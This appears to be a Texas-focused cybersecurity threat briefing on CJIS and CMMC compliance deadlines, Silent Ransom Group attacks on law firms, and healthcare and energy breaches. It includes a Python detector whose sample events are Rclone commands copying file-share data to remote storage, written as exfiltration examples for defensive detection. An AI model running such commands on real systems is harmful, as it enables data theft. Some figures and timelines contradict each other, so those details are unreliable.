CJIS v6.0: Audit Transition Underway
The FBI released CJIS Security Policy v6.0 on December 27, 2024 — the largest policy modernization in over a decade. The framework now contains more than 180 primary controls and 1,300 subcontrols across 20 policy areas (expanded from 13). Key changes include mandatory MFA for system access, continuous monitoring replacing point-in-time audits, tightened physical security requirements, and NIST 800-53 alignment that makes framework integration easier.
All Texas CJIS audits through March 31, 2027 are conducted against v5.9.5. Several state advisories indicate FBI audits begin assessing against v6.0 starting October 1, 2025. P1 (Priority 1) controls are immediately auditable and sanctionable — agencies should have already started gap assessments. Full compliance across all priority levels (P1–P4) is required by March 31, 2027.
Version 6.1 is expected in Spring 2026, initiating a stated cadence of updates every 6–12 months. This means compliance is no longer a one-time project — agencies must build continuous compliance programs. Planet Technologies is hosting a CJIS v6.0 preparation webinar June 10, 2026.
SLCGP Funding Active for Texas Municipalities
The State and Local Cybersecurity Grant Program (SLCGP) Year 3 Request for Applications closed February 12, 2026. Texas municipalities that missed it should monitor for additional grant opportunities. The FY 2025 FEMA NOFO required entities with CISA-approved Cybersecurity Plans to resubmit them by January 30, 2026. These grants are critical for municipalities that lack dedicated cybersecurity budgets.
Coordinated Ransomware: Continuing Threat
The coordinated ransomware campaign that struck 22 Texas municipalities in late 2025 (with a collective $2.5M ransom demand refused by all targets) set a precedent for coordinated multi-agency response. TX DIR's coordinated response protocols remain active. Municipalities that have not reviewed their incident response plans and ransomware policies should do so immediately. FBI and CISA advisories continue to flag ransomware as the primary threat to state and local government.
Sources: TX DPS CJIS Policy & Documents (dps.texas.gov); CJIS v6.0 Requirements Companion Doc v6.0 (Jan 22, 2025) (PDF); Planet Technologies CJIS v6.0 Unpacked (go-planet.com); CyberEye Solutions CJIS Security Policy v6.0 (cybereyesolutions.com); TX DIR SLCGP (dir.texas.gov); CISA SLCGP Fact Sheet (cisa.gov); FEMA FY2025 SLCGP NOFO (fema.gov); NuHarbor Security 2026 CJIS Compliance Checklist (nuharborsecurity.com); NuHarbor Security CJIS Audits (nuharborsecurity.com); TX DIR Ransomware Update (dir.texas.gov); TX DIR SLCGP Update (dir.texas.gov); Fulcrum Group CJIS v6.0 Review (fulcrumgroup.net PDF); National Association of Counties FBI CJIS Requirements (naco.org).
CMMC Phase 1 (November 10, 2025 – November 9, 2026) is now active. CMMC Level 1 and Level 2 self-assessments are appearing as conditions of award in applicable new DoD solicitations. Contracting officers may also require Level 2 C3PAO certification in select Phase 1 contracts involving sensitive CUI. All contractors must maintain a current SPRS score for contract eligibility.
Phase 2 begins November 10, 2026. Contracting officers will begin requiring C3PAO-assessed Level 2 certification as a condition of contract award for most CUI contracts. With ~10 months until this gate, and preparation taking 12–18 months plus 3–6 months for C3PAO scheduling, the window for contractors who haven't started is effectively closed for November 2026 certification. There are approximately 300,000 companies in the DIB supply chain; only ~200 have completed C3PAO assessments. Less than 5% of the DIB is currently CMMC-ready.
InterConnect Wiring (Fort Worth, TX) — a world leader in electrical wiring harnesses for advanced military aircraft, part of the Lockheed Martin F-35 supply chain — signed a Memorandum of Understanding with Lockheed Martin in 2025 specifically to build a security-focused relationship. InterConnect Wiring is actively pursuing CMMC certification. Their journey illustrates the stakes: Lockheed Martin's supplier directive states "any lapse in required CMMC status will directly impact your organization's ability to receive DoD subcontracts."
Major primes are not waiting for the November 2026 DoD deadline. Huntington Ingalls Industries (HII) flowed down Level 2 (C3PAO) requirements to subcontractors by Q4 2025 — 12 months ahead of schedule. RTX (Raytheon parent) issued a supplier CMMC status survey in March 2026. Lockheed Martin, Boeing, and General Dynamics Mission Systems have all issued supplier directives with explicit consequences for non-compliance.
The FY 2026 National Defense Authorization Act (signed December 2025, ~$900 billion) includes provisions reshaping compliance burden for smaller contractors. The CMMC 2.0 final rule (32 CFR Part 170) and companion DFARS acquisition rule are fully active. False Claims Act exposure is real: misstating CMMC compliance or failing to remediate critical deficiencies can trigger civil FCA action.
For Texas defense contractors in the Fort Worth aerospace corridor, the Bell supply chain, the NASA JSC contractor community, and all organizations handling CUI on DoD contracts — this is a make-or-break 10-month window. Organizations that don't achieve certification risk losing existing contracts and being excluded from recompetes.
Sources: InterConnect Wiring Blog (interconnect-wiring.com); LayerLogix CMMC 2.0 Texas Defense Contractors (layerlogix.com); Kiteworks CMMC Armament Manufacturers (kiteworks.com); VSO CMMC Phase 2 Action Guide (vso-inc.com); StratoKey CMMC Flow Down Requirements (stratokey.com); Alston & Bird CMMC New Era of Cybersecurity Compliance (alston.com); Morgan Lewis CMMC In Effect (morganlewis.com); Dorsey CMMC Phase 1 (dorsey.com); Intersec Inc. Federal Contractor's Guide to CMMC 2.0 (intersecinc.com); SecureFrame CMMC Timeline (secureframe.com); PreVeil CMMC Contracts (preveil.com); IBSS Corp Future of CMMC 2026 (ibsscorp.com); HD Tech CMMC Compliance Guide (hdtech.com); iSideDefense Prime CMMC 2.0 (isidefense.com); Elevate Consulting CMMC 2.0 Certification (elevateconsult.com).
Silent Ransom Group (SRG) — Escalating Physical-Cyber Convergence
SRG, also known as Luna Moth, Chatty Spider, and UNC3753, has been actively targeting law firms since 2023. The FBI issued a Private Industry Notification in May 2025 warning of the campaign. An FBI Flash Alert (TLP:CLEAR, May 26, 2026) confirmed SRG has evolved its tactics significantly. The group has progressed through three attack phases: (1) callback phishing via IT-themed emails; (2) vishing — direct phone calls impersonating victim IT staff; (3) in-person visits where an individual arrives at the firm posing as IT support and physically inserts a storage device into a computer to exfiltrate data.
As of Spring 2026, SRG actors use a social engineering scheme to pose as an employee from the victim's IT department. They either directly call or send phishing emails urging employees to call a phone number, then direct the employee to grant access to a remote desktop session. Once access is granted, data is exfiltrated using tools like WinSCP or disguised versions of Rclone. SRG prioritizes data theft over encryption — they exfiltrate sensitive information, then threaten to publish or sell it. They also call employees or clients of victim organizations to pressure ransom negotiations.
Orrick, Herrington & Sutcliffe (international firm, $1.5B+ gross revenue) was breached by SRG with network access beginning January 20, 2026. SRG remained inside the Orrick network for approximately one week before exfiltration was detected. WSHB (Wiley, Selen, Weller, Bush & Taylor) had SRG access begin February 20, 2026. SRG informed DataBreaches.net they had exfiltrated data from both firms.
Halcyon threat intelligence data shows 200+ ransomware incidents targeting law firms between 2025 and early 2026. INC Ransom claimed 20 law firms and legal services organizations in the first three months of 2026 alone. SRG claimed 24 organizations providing legal services in 2025. FBI IC3 2025 data attributed $2.4 billion in BEC losses to law firm impersonation and data breach exploitation — 18% of all BEC losses nationally.
SRG's longer-than-average dwell time (average 23 days vs. industry median of 7 days for ransomware) indicates a deliberate data-collection phase. Law firms with access to M&A transaction data, trust account information, and client privileged communications are the primary targets. A breach during a closed PE deal window carries seven-figure indemnity exposure. M&A cyber due diligence now appears in over 70% of private equity transaction checklists for deals above $25M.
Defense posture for Texas law firms: Enforce MFA on all Microsoft 365 and email accounts; implement physical access verification for IT vendors (require ID check before granting access to facilities or computers); conduct regular phishing and vishing awareness training; implement RBAC restricting deal data access to need-to-know; ensure M&A data environments have attestation-level security controls.
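An added detection example for the exfiltration tooling described above (WinSCP and disguised Rclone); it is not taken from the FBI alerts or from any product. It assumes process-creation events that use Sysmon Event ID 1 field names, and the `OriginalFileName` values, sample events and finding labels are constructed for illustration.

```python
import ntpath
import re

# Assumption: records use Sysmon Event ID 1 field names. OriginalFileName is
# read from the PE version resource, so it survives a simple file rename; the
# two values below are assumed for the stock Windows builds of each tool.
TOOL_BY_ORIGINAL_NAME = {"rclone.exe": "rclone", "winscp.exe": "winscp"}

# Rclone transfer verbs, a "remote:path" argument (two or more characters
# before the colon, so drive letters do not match) and common transfer flags.
RCLONE_VERB = re.compile(r"\s(copy|sync|move)\s", re.I)
RCLONE_REMOTE = re.compile(r"\s[A-Za-z0-9_-]{2,}:\S*")
RCLONE_FLAGS = ("--config", "--transfers", "--no-check-certificate", "--bwlimit")


def classify(event):
    """Return the findings for one process-creation event (empty if clean)."""
    findings = []
    image = ntpath.basename(event.get("Image", "")).lower()
    original = event.get("OriginalFileName", "").lower()
    cmdline = event.get("CommandLine", "")

    tool = TOOL_BY_ORIGINAL_NAME.get(original) or TOOL_BY_ORIGINAL_NAME.get(image)
    if tool and original in TOOL_BY_ORIGINAL_NAME and image != original:
        findings.append(f"renamed-{tool}")      # on-disk name hides the tool
    elif tool:
        findings.append(f"{tool}-present")      # undisguised, still worth review

    # Behavioural check: still fires when the version resource was stripped.
    has_flag = any(flag in cmdline.lower() for flag in RCLONE_FLAGS)
    if RCLONE_VERB.search(cmdline) and RCLONE_REMOTE.search(cmdline) and has_flag:
        findings.append("rclone-style-transfer")
    return findings


def triage(events):
    """Return (host, image, findings) for every event with a finding."""
    return [(e["Computer"], e["Image"], f) for e in events if (f := classify(e))]


# Constructed sample events, not taken from any real incident.
SAMPLE_EVENTS = [
    {"Computer": "WS-014", "Image": r"C:\Users\Public\svc_update.exe",
     "OriginalFileName": "rclone.exe",
     "CommandLine": r"svc_update.exe copy D:\Matters remote1:bk --config C:\Users\Public\r.conf --transfers 8"},
    {"Computer": "WS-022", "Image": r"C:\Program Files (x86)\WinSCP\WinSCP.exe",
     "OriginalFileName": "winscp.exe", "CommandLine": "WinSCP.exe /console"},
    {"Computer": "WS-031", "Image": r"C:\ProgramData\helper.exe",
     "OriginalFileName": "",
     "CommandLine": r"helper.exe sync \\fs01\deals box:out --bwlimit 10M --no-check-certificate"},
    {"Computer": "WS-040", "Image": r"C:\Windows\System32\Robocopy.exe",
     "OriginalFileName": "robocopy.exe",
     "CommandLine": r"Robocopy.exe C:\Data E:\Backup /MIR"},
]

if __name__ == "__main__":
    for host, image, findings in triage(SAMPLE_EVENTS):
        print(host, image, ", ".join(findings))
```

A `winscp-present` or `rclone-present` finding on a workstation where IT has no record of installing the tool is a reason to check who initiated the preceding remote desktop session.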
Sources: FBI Private Industry Notification — Silent Ransom Group Targeting Law Firms (May 2025) (fbi.gov PDF); FBI Flash Alert TLP:CLEAR — Silent Ransom Group Impersonating IT Personnel (May 26, 2026) (aha.org); FBI IC3 CSA 2026/260526 (ic3.gov PDF); DataBreaches.net — SRG Leaked Orrick (April 10, 2026) (databreaches.net); DataBreaches.net — Silent Threat Loud Consequences (April 13, 2026) (databreaches.net); Halcyon — INC Ransom Mounts Rapid Campaign Against Law Firms (halcyon.ai); BleepingComputer — FBI Warns of SRG In-Person Data Theft (bleepingcomputer.com); Help Net Security — FBI SRG Social Engineering (May 27, 2026) (helpnetsecurity.com); InfoSecurity Magazine — SRG IT Impersonation (infosecurity-magazine.com); HIPAA Journal — SRG Vishing Attacks (hipaajournal.com); eSecurity Planet — SRG IT Impersonation Attacks (esecurityplanet.com); Cyble — FBI Warns SRG Targeting US Law Firms (cyble.com); Halcyon — FBI Alerts on SRG (halcyon.ai); HIPAA Journal — SRG Social Engineering IT Department (hipaajournal.com); Truesec — SRG Targeting Law Firms (truesec.com); Security Affairs — SRG Targeting Law Firms FBI Warn (securityaffairs.com).
Healthcare: Nacogdoches Memorial Sets New Breach Record
Nacogdoches Memorial Hospital (NMH), a 226-bed facility in East Texas, disclosed a data breach affecting 2,507,073 patients — confirmed by the HHS Office for Civil Rights breach portal. The incident was discovered January 31, 2026. NMH confirmed the threat actor accessed and exfiltrated: names, addresses, phone numbers, email addresses, Social Security numbers, dates of birth, medical record numbers, medical account numbers, health plan beneficiary numbers, and possible photographic images.
Critically: no ransomware was deployed. No system lockout occurred. This is pure data exfiltration — "data-first" extortion. The attacker maintained access for approximately two weeks before discovery, draining a massive database without triggering the operational alarms associated with locking down systems. NMH did not offer complimentary identity protection or credit monitoring to affected patients, advising them only to obtain free credit reports.
This is part of a broader trend. Healthcare ransomware attacks surged 30% in 2025 (Comparitech data). Healthcare was the worst-affected sector, accounting for 22% of all ransomware attacks globally in 2025. The healthcare sector's attack surface has expanded significantly due to IoT medical devices, EHR cloud migrations, and a high concentration of rural critical access hospitals with limited IT security resources. CISA's 2025 advisory noted 68% of medical device vulnerabilities in ICS-CERT advisories originated from network-connected diagnostic equipment — many running Windows 7 embedded or unpatched Linux kernels.
Other Texas healthcare breaches in scope: North Texas Behavioral Health Authority (285,000 affected; network intrusion October 2025, disclosed March 2026; SSNs among potentially exfiltrated data); Texas Digestive Specialists (44,579 patients; Interlock ransomware group, May 2025; linked to CISA/FBI joint Interlock advisory; described by Federman & Sherwood as "one of the more serious healthcare data breaches reported in Texas this year"); Central Texas Pediatric Orthopedics (140,000 patients; Qilin ransomware group claimed 42GB of exfiltrated data including passport images, February 2025); Conduent Business Services (~14.7 million Texans affected; breach October 21, 2024 – January 13, 2025; TX AG Ken Paxton opened investigation February 12, 2026).
Oil & Gas: Ransomware Surge Continues Unabated
Zscaler's ThreatLabz 2025 report documented a 935% year-over-year surge in ransomware targeting oil & gas operations (April 2024 to April 2025) — the fastest-growing critical infrastructure vertical. TrustWave's January 2025 data showed ransomware targeting energy/utilities increased 80% versus 2024. Sophos survey data (July 2024) found 67% of energy/OT cybersecurity leaders had suffered a ransomware attack in the prior year.
Halliburton (Houston-based, world's #2 oil service company, involved in most global fracking operations) was attacked by RansomHub in April 2025. The breach cost Halliburton $35 million in losses and forced the company to shut down IT systems and disconnect customers. RansomHub was the most prolific ransomware group of 2025 (833 publicly named victims), though the group disappeared in April 2025 after ceasing operations.
Dragos reported a dramatic surge in ransomware targeting industrial organisations, continuing into 2025–26. Claroty documented credential-stealing malware attacks on OT environments jumping 46% from Q4 2024 to Q1 2025, with credential-stealing malware specifically increasing 3,000% in the same period. The S16 hacktivist group (Russia-nexus, Serbia-based) conducted a joint attack with Z-Pentest on the SCADA system managing oil pumps and storage tanks in Texas in January 2025 — demonstrating the convergence of cybercriminal and nation-state hacktivist targeting of Texas energy infrastructure.
Oil & gas operators face unique challenges: high convergence between IT and operational technology (OT), limited backup sophistication, extreme time pressure to restore production (72-hour downtime losses can exceed $10M per incident per facility), and interconnected supply chains where a mid-size operator's breach can affect larger industry players. The economics strongly favor attackers: high willingness to pay + limited security investment + operational urgency = elevated ransomware targeting.
Sources: HIPAA Journal — Nacogdoches Memorial Data Breach (hipaajournal.com); SecurityWeek — 250K Affected by Nacogdoches Breach (securityweek.com); SecurityWeek — Healthcare Breaches Illinois Texas 600K (securityweek.com); The Cyber Signal — NMH Confirms Massive Data Breach (thecybersignal.com); Industrial Cyber — Healthcare Ransomware Surge 30% (industrialcyber.co); MySA — Texas Digestive Specialists Breach (mysanantonio.com); Bank Info Security — Texas Pediatric Orthopedics 140K (bankinfosecurity.com); Evrimagaci — Texas Probes Massive Health Data Breach (evrimagaci.org); CyberNews — Healthcare Organizations Texas Illinois Breaches (cybernews.com); Cybersec Series — Texas Hospital Breach CISA NetScaler (cisoseries.com); Halock — Texas Hospital Disrupted by Ransomware (halock.com); CybersecurityDive — Zscaler Ransomware Report (cybersecuritydive.com); Industrial Cyber — Zscaler Oil Gas Surge 935% (industrialcyber.co); Resecurity — Cyber Threats Against Energy Sector Surge (resecurity.com); Spencer Fane — Cybersecurity in Oil and Gas (spencerfane.com); Telesoft Technologies — Single Greatest Cyber Risk Oil Gas 2026 (telesoft-technologies.com); Industrial Cyber — OT Security Spending Post Epic Fury (industrialcyber.co); Natural Gas Intel — TX Regulator Iranian Cybersecurity Threats (naturalgasintel.com).
The following observations are drawn from our operational visibility into Texas networks. No client-specific data is referenced.
Data-first extortion is now the dominant ransomware strategy. Across Texas networks we monitor, the shift from encryption-based ransomware to pure data exfiltration is clear. The Nacogdoches Memorial breach — 2+ weeks of undetected access, 2.5M records drained without triggering operational alarms — is the textbook case. Attackers have learned that silent data theft produces faster ransom pressure than locking systems and triggering incident response. Organizations that rely solely on backup integrity monitoring without data access anomaly detection are flying blind.
Ransomware ecosystem is fragmenting but attack volume is at record highs. Nearly 6,500 confirmed ransomware incidents occurred globally in 2025 — the second-highest year on record after 2023, representing 47% more attacks than the prior two years combined. 57 new ransomware groups and 27 new extortion groups emerged in 2025. The dark web RAMP forum (a primary ransomware-as-a-service hub) was seized by authorities in January 2026; LeakBase was seized in March 2026. These disruptions will drive actors to new infrastructure — expect new attack patterns and possible temporary disruptions followed by rapid adaptation.
Stolen credentials remain the #1 initial access vector. Dark web markets are flooded with valid credentials. The average cost of initial network access on dark web markets is approximately $671; premium enterprise access sells for shockingly low amounts given what it unlocks. Multi-factor authentication gaps remain the single highest-leverage vulnerability across Texas organizations we observe.
AI-augmented social engineering is accelerating. Generative AI is reducing the cost and improving the believability of phishing lures, pretext phone calls, and contextually appropriate business communications. We are tracking AI-generated spear-phishing campaigns that reference real internal org chart data, recent business events, and industry-specific terminology. Traditional email filters are increasingly ineffective against these campaigns.
Physical+cyber convergence is a new attack surface. SRG's in-person IT impersonation represents a meaningful escalation. This means physical security controls must now account for social engineering scenarios involving legitimate-appearing third parties. Verification procedures for on-site IT work deserve renewed scrutiny at every organization we serve.
Insider recruitment activity is increasing. Multiple threat intelligence sources confirm ransomware operators are increasingly recruiting corporate insiders — driven in part by workforce reductions at major companies persisting into 2026. Insider threat programs should be evaluated and strengthened as a priority.
Sources: Blackfog — State of Ransomware 2026 (blackfog.com); SANS Institute — Stay Ahead of Ransomware 2026 Reports (sans.org); Recorded Future — Ransomware Tactics 2026 (recordedfuture.com); Securelist — State of Ransomware 2026 (securelist.com); Cyble — 10 New Ransomware Groups 2025 (cyble.com); Huntress — Ransomware Trends 2026 (huntress.com); Unit 42 — 2026 Global Incident Response Report (paloaltonetworks.com); GuidePoint Security GRIT 2026 Ransomware Report (guidepointsecurity.com PDF); Level.io — Ransomware 2026 (level.io); Integrity360 — Reality of Ransomware 2026 (integrity360.com); SOCRadar — US State Local Government Ransomware 2025-2026 (socradar.io); DeepStrike — Ransomware Statistics 2025-2026 (deepstrike.io); Bitsight — Underground Ransomware 2026 (bitsight.com); LNX Network — New Ransomware Variants 2026 (lnxnetwork.com).